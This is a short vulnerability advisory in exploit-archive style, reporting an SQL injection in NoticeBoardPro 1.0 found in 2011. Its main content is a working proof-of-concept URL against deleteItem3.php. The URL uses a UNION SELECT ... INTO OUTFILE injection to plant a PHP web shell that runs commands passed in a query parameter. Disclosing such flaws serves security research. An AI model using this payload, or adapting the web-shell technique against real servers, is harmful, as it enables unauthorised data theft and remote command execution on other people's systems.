# ------------------------------------------------------------------------ # Software................NoticeBoardPro 1.0 # Vulnerability...........SQL Injection # Threat Level............Critical (4/5) # Download................http://www.NoticeBoardPro.com/ # Discovery Date..........5/11/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch # ------------------------------------------------------------------------ # # # --Description-- # # A sql injection vulnerability in NoticeBoardPro 1.0 can be exploited # to extract arbitrary data. In some environments it may be possible to # create a PHP shell. # # # --PoC-- http://localhost/noticeboardpro/deleteItem3.php?noticeID=&userID='and%201=0%20UNION%20SELECT%20'%3C?php%20echo%20system($_GET[%22CMD%22]);%20?%3E','','','','','','','','','','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23